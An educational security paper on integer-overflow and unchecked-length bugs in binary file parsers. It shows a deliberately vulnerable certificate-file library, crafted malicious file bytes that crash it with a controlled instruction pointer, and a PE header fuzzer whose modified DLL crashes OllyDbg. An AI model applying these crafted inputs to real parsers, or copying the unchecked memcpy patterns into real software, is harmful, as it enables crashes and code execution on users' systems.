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 · 28 Dec 2019


Analyzing Common Binary Parser Mistakes
Orlando Padilla
Last modified: 12/05/2005

Abstract: With just about one file format bug being
consistently released on a weekly basis over the past six to twelve
months, one can only hope developers would look and learn. The
reality of it all is unfortunate; no one cares enough. These bugs
have been around for some time now, but have only recently gained
media attention due to the large number of vulnerabilities being
released. Researchers have been finding more elaborate and passive
attack vectors for these bugs, some of which can even leverage a
remote compromise.

No new attacks will be presented in this document, as examples and
an example file format will be presented to demonstrate an insecure
implementation of a parsing library. As a bonus for reading this
article, an undisclosed bug in a popular debugger will be released
during the case study material of this paper. This vulnerability,
if leveraged properly, will cause the debugger to crash during the
loading of a binary executable or dynamic library.

Disclaimer: This document is written with an educational
interest and I cannot be held liable for any outcome of the
information being released.

Thanks: #vax, nologin, and jimmy haffa

= Introduction

A number of papers have already been written describing the
exploitation of integer overflows, however, very few publications
have been aimed at the exploitation of integer overflows within
binary parsers. The current slew of advisories released by iDefense
(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and
Alex Wheeler via (Multiple AV Vendors) on file format
bugs should be enough to take these bugs seriously.

The most common mistake applied by a programmer is in trusting a
field inside a binary structure that should not be trusted. During
the design phase: efficiency, simplicity and the secure
implementation of a particular project should be at the top of the
priority list. When dealing with data that cannot be presented only
as strings, a length field is required to tell the application when
to stop reading. When dealing with sections that must have
subsections, knowing ahead of time how many sections are embedded
within the primary section of a structure is required and again, a
value must be used to instruct the application only to iterate
x number of times. In the following paragraphs, the
description of a binary file structure will be presented, followed
by applied examples of typical coding errors encountered when
auditing applications. An overview of integer overflows will be
discussed for the sake of completeness. Finally, a case study of
several bugs found during the research of a particular file format
will be shown.

= Certificate Storage File

The following file format was designed and written specifically for
this article and has no real world applicable use. The general idea
behind the implementation of this file format is to create a single
binary file acting as a searchable database for certificate files.
The file will consist of two core structures, which will hold the
information necessary to parse the certificates in DER format. This
is a rough diagram of what the file looks like after compilation:

| Structure | Offset | Size |
| OP Header | 0 | 4 |
| Element Count | 4 | 2 |
| Cert File Fmt Struct | 6 | 6 |
| Cert Data Struct | 12 | 16 |
| Cert 1 | | |
| Cert 2 | | |
| Cert | | |
| Cert n | | |

= Binary Layout

The following structures are defined on the file format's compiler

typedef struct _CERTFF
unsigned int NumberOfCerts;
unsigned short PointerToCerts;

typedef struct _CERTDATA
char Name[8];
unsigned short CertificateLen;
unsigned short PointerToDERs;
unsigned char *DataPtr;

The first data structure consists of two unsigned integers, (short)
NumberOfCerts and (long) PointerToCerts. These hold the number of
certificates in total, stored in this binary NumberOfCerts and the
offset from the beginning of the file to the first certificate data
structure CERTDATA PointerToCerts. We can already assume that a
parser will iterate through the image file NumberOfCerts times,
starting from PointerToCerts in chunks of the size of CERTDATA at a
time. The second data structure consists of a character array 8
bytes in size, which is used to hold the first 7 characters of a
certificate's description, followed by two unsigned short integers
which hold the length of the certificate referred to by this
structure, and the offset to the beginning of the certificate
respectively. The last element is an unsigned char, which is used
to carry the body of the certificate by the compiler.

= Applied Examples

As the number of buffer overflows decreases, the number of integer
overflows and improper file and binary protocol parsing bugs
increases. The following URL query to OSVDB's (Open Source
Vulnerability) database for integer overflows is a perfect example
of the diversity of applications affected. The list is rather short
considering the number of vulnerabilities actually released in the
past two - three years. Still, it accurately displays different
levels of severity: Kernel, Library, Protocol and file format bugs.

As a proof of concept, I developed a parsing library for the
construct above. See Appendix A for code. The code functionality
is simple. As explained above it consolidates certificates (in this
example) into a single file. There are several bugs in the library
that I mocked from actual implementations of different open source
and closed source applications. The first vulnerability exists in
the single cert extraction tool 'certextract.c'. The issue is
pretty obvious; the library trusts that the file being parsed has
not been tampered with. The following code snippet highlights the

igned char cert_out[MAX_CERT_SIZE];
16 unsigned char *extract_cert = "req1.DER";
64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert));
66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen);

The vulnerability exists because the library assumes the certificates
will not be larger than MAX_CERT_SIZE due to the compiler's
inability to take files larger than the set size. All an attacker has
to do is modify the file using an external editor or reverse engineering
the file format and creating a malicious certificate db. A step-by-step
example on exploitation of this bug is out of the scope of this
document, but let's look at what has to be done to prepare an exploit
for this vulnerability.

We already know we have to modify the length field to something
larger than MAX_CERT_SIZE or if we look specifically at
'certlib.h', larger than 2048 bytes. Looking at the structure of
the headers, we can see that each certificate has its own length
field. So creating a valid structure header and placing it at a
correct offset along with a corresponding payload should do the
trick. With this in mind, calculate the number of bytes from the
beginning of the file to the first certificate.

[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct]

It seems we can drop our fake structure after the 12th byte. The
cert structure will look something like the following (depending on
the size of the payload you are using):

unsigned char exploit_dat1[] = {

/* Name of our fake cert */
0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our, length */
0x53, 0x08,
/* where we can write our data, PointerToDer*/
0x18, 0x00,
/* DataPtr just for completion */
0x00, 0x00, 0x00, 0x00

Notice the length is an unsigned short integer that limits our payload
to 0xFFFF (65535), which should be more than enough space. The
two most important sections of our structure are the length, and the value
we give PointerToDer since this will point to the beginning of our
payload. Since we are choosing to make our fake certificate the first
one on the list, anything below it can be overwritten with little
concern. At offset 0x18 of the dat file we have 0x0853
bytes of A's, notice there is no bounds check on this value. Below is a
sample run of a valid certsdb.dat file and a second sample run with our
malicious dat file.

(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER
cert req1.DE
len: 657 PtrToData: 90

(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER
e3e45e30b18a6fc9f6134f0297485cc1 req1.DER
e3e45e30b18a6fc9f6134f0297485cc1 out.DER

(gdb) r ./badcertdb.dat out.DER
Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER
cert req1.DE
len: 2131 PtrToData: 27

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

The actual exploitation of this vulnerability is left as an exercise
for the reader, given the file structure necessary to build the attack
it is now trivial to complete.

= Continuing Applied Examples

The utility 'certdb2der.c' provided in this example suite iterates
through the dat file and dumps the contents of each certificate into
individual files. The CERTFF (Certificate File Format) structure
contains an element called NumberOfCerts of type unsigned int. This
integer explicitly controls the loop iterator, controlling the number
of CERTDATA structures said to be in the body of dat file.

60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA);
62 pCertData = (PCERTDATA)malloc(alloc_size);
64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1);

An integer overflow condition may be triggered during memory allocation
for the 'pCertData' array of structures. If a specially crafted dat
file contains a high enough value during memory allocation, pCertDat
array is deemed inproper by the multiplication in
line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA).
The maximum value for an unsigned integer is (4294967295) or
0xffffffff, so when the value at NumberOfCerts is multiplied
by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value
to wrap resulting in an invocation negative malloc() or a malloc(0).
This could then be leveraged into executing arbitrary code on certain
malloc implementations by overwriting control structures in the heap.
Again, exploitation is not covered in detail, but pre-exploitation is
explained below. Please refer to the references section for papers
covering heap overflow exploitation.

Constructing a fake valid CERTFF chunk and properly placing it in a dat
file will be what most of the work consists of when preparing for file
format exploit. The first 6 bytes of our file will remain the same, so
we can assume our exploit to look something to the following:

[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...]
[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ]

unsigned char exploit_dat1[] = {
/* header info */
0x4f, 0x50, 0x00, 0x00, 0x01, 0x00,
/* our length followed by our certs pointer */
0xff, 0xff, 0xff, 0xff,
0x0a, 0x00,
/* One valid cert */
0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our length */
0x00, 0x07,
/* where we can write our data to PointerToDer*/
0x00, 0x26,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,

unsigned char exploit_dat2[] = {
/* fake certs for fill */
0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00,
/* our length */
0x00, 0x10,
/* where we can write our data to PointerToDer*/
0x26, 0x04,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,

The pseudo code below denotes the structure of the rest of the binary
dat file.

for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2))
memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2));

In short, the code copies the contents of our second structure
, after the 24th byte till the end of the buffer is
reached. The following displays an iteration of the utility used correctly,
followed by an iteration through the malicious certificates db file.

(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat
req1.DE of length: 657 is being written to disk...
req2.DE of length: 649 is being written to disk...
req3.DE of length: 653 is being written to disk...
req4.DE of length: 651 is being written to disk...
req5.DE of length: 652 is being written to disk...
(xbud@yakuza <~/code/random>) $

(gdb) r 2badcertdb.dat
Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat

Program received signal SIGSEGV, Segmentation fault.
0xb7e1267f in memcpy () from /lib/tls/
(gdb) x/i $pc
0xb7e1267f <memcpy+47>: repz movsl %ds:(%esi),%es:(%edi)
(gdb)i reg
eax 0xffffffff -1
ecx 0x3fff9c02 1073716226
edx 0x804a008 134520840

Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value
stored in eax is -1 which when converted to unsigned inside memcpy, 4GB
of data are copied into our destination buffer of only 0x800 bytes in

= Case Study
= The Microsoft PE/COFF Headers

There a number of documents and tools out there that explain the
structure of Microsoft's infamous PE (Portable Executable) and old
Unix Style COFF (Common Object File Format) header. As such, I will
refrain from elaborating on what each element inside each structure
does. Instead, I will focus on the critical sections that may allow
an attacker to alter the contents of header elements specifically to
break implementations of PE/COFF parsers.

With that in mind we can now begin our journey into the world of PE.
At file offset 0x3C as specified in MS's pecoff.doc, there is a four
byte signature PE, immediately after the signature of the
image file, there is a standard COFF header of the following format:

unsigned short Machine;
unsigned short NumberOfSections;
unsigned int TimeDateStamp;
unsigned int PointerToSymbolTable;
unsigned int NumberOfSymbols;
unsigned short SizeOfOptionalHeader;
unsigned short Characteristics;

Does anything look similar to our hypothetical file format used in
the examples above?

NumberOfSections and NumberOfSymbols are all synonymous to
NumberOfCerts with respect to their own file format. These
elements, along with SizeOfOptionalHeader make for interesting
attack vectors. Before strolling further along into the COFF Header
specifics, it is important to pay a bit more attention to the offset
0x3C being referred to in the PECOFF.doc document. It
states that the file offset specified at offset 0x3C from
the image file, points to the PE signature.

What would happen if this file offset was bogus? What if the offset
at offset 0x3C points to fstat(image).st_size + 1 ?
We cause the parser to access illegal memory. This bug was present in
the majority of the PE Viewers tested. Although the significance of this
bug is minimal since the modified binary will no longer execute, picture a
scenario where an attacker simply needs to crash an application which
happens to preprocess a PE Header? All an attacker must do to trigger
this bug is build a fake MZ header also known as a Dos Stub header and
invalidate the 0x3C offset. The MS-DOS Stub is a
valid application that runs under MS-DOS and is placed at the front of the
.EXE image. The linker places a default stub here, which prints out the
message "This program cannot be run in DOS mode" when the image is run in

The second element, NumberOfSections, indicates the number of
Section Headers this file has mapped. Once again, fuzzing this
element with random numbers yields interesting results on tools
like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc...

Continuing our dive into PE madness, following the COFF Header there
is an OPTIONAL_HEADER also referred to as the PE Header which
consists of the following elements:

unsigned short Magic;
unsigned int ImageBase;
unsigned short MajorOperatingSystemVersion;
unsigned short MinorOperatingSystemVersion;
unsigned int SizeOfImage;
unsigned int SizeOfHeaders;
unsigned int LoaderFlags;
unsigned int NumberOfRvaAndSizes;

There were a number of elements omitted here for the sake of brevity,
most of which aid the loader in identifying the type of file and its
core mappings. Please refer to the appendix for more information on
what each specific element means. Again, several elements in this
structure look interesting enough to play with, however we will only be
looking at the IMAGE_DATA_DIRECTORY array of entries. In
particular, the first index of that directory contains a pointer to the
NumberOfRvaAndSizes in the structure above refers to the number of
elements in the DataDirectory array. The following is the
structure which is the last structure
fuzzed for this case study.

unsigned long Characteristics;
unsigned long TimeDateStamp;
unsigned short MajorVersion;
unsigned short MinorVersion;
unsigned long NameRVA;
unsigned long OrdinalBase;
unsigned long NumberOfFunctions;
unsigned long NumberOfNames;
unsigned long ExportAddressTableRVA;
unsigned long ExportNameTableRVA;
unsigned long ExportOrdinalTableRVA;

The Export Directory Table contains address information that is
used to resolve fix-up references to the entry points within this image.
The elements NumberOfFunctions, NumberOfNames indicate the obvious and
again if something trusts the number in this structure without error
checking, unexpected results can occur.

= Introducing breakdance.c

Although file fuzzing is relatively simple, tools help reduce the amount
of time it takes for you to reconstruct a format to reach deep into a
section buried within several structures. I typically use
xxd -i, hd (hexdump), or shred (hexeditor)
for windows to reconstruct a binary image and fuzz the structures
manually, but I decided to develop a tool to do the work for me in the
case of PE. The following options are available:

Usage: ./breakdance [parameters]
-v verbose
-o [file] File to write to (defaults) out.ext
-f [file] File to read from
-e [value] Modify Export Directory Table's number
of functions and number of names
-p Print sections of a PE file and exit
-c Create new section (.pepe) not to be used with -m
-s [section] Section to overwrite (can be used with -c)
-m [section] [value]
-n [length] Fuzz Export Directory Table's Strings
Modify [section] with [int] where:
section is one of [image_start] [number_of_sections]

ex. ./breakdance -v -o out -f pebin -m "image_start" 65536
ex. ./breakdance -v -o out -f pebin -c -s .rdata

[Warning if -o option isn't provided with mod options, changes are discarded]

The following is a list of binary parsers affected by the fuzzing options
provided by breakdance.c, the list is by no means comprehensive in the
sense of PE parsers but it is all I test against. The fuzzing capabilities
are rather minimal considering the number of structures and elements
accompanied by the PE/COFF specification, however it is enough to
demonstrate how broken, binary parsers can be.

| Tool Name | Vendor | Section |
| PE View | Wayne Radburn | All |
| MSVS bindump | Microsoft | All |
| OllyDbg | Oleh Yuschuk | NumberOfFunctions |
| PE Explorer | | NumberOfSections |

= Affected Toolsets

Although I can almost guarantee other parsers are just as buggy,
this selection is pretty well known and should suffice as a
demonstration. The only issue I will elaborate on is the OllyDebug
denial of service attack. This issue is interesting due to the fact
that even after modifying the PE Image to DoS OllyDebug, the binary
itself is still executable. This can be leveraged as an attack
vector against reverse engineerers who rely on olly debug to reverse
binaries. The following is a run of breakdance against a DLL.

(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \
/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll


NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647
Dumping 348160 bytes

(xbud@yakuza <~/code/random>) $

-- Inside WinDbg --

This exception may be expected and handled.
eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000
eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293

*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\tools\odbg110\OLLYDBG.EXE -

0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=????

0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4
00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b

= Conclusions

The general rule of thumb here is not to trust any user modifiable
data. The trust between application and input components such as
sockets, file I/O, named pipes etc. should always be minimal and at
an extreme, should be considered dangerous. The fact that a file
format specification exists is not an excuse to assume all data
gathered from an alleged file is valid. Validate your input against
a working ruleset, and if the assertion fails, raise an exception.
Keeping your code simple means accept only valid input, deny all

All the code referenced is provided in the attached tar ball, a
safer version of the library for parsing the hypothetical file
format developed for this paper is included for demonstration

= Bibliography

OSVDB. OSVDB Advisory Descriptions

Microsoft Corporation. PECoff Specification

blexim. Integer Overflows

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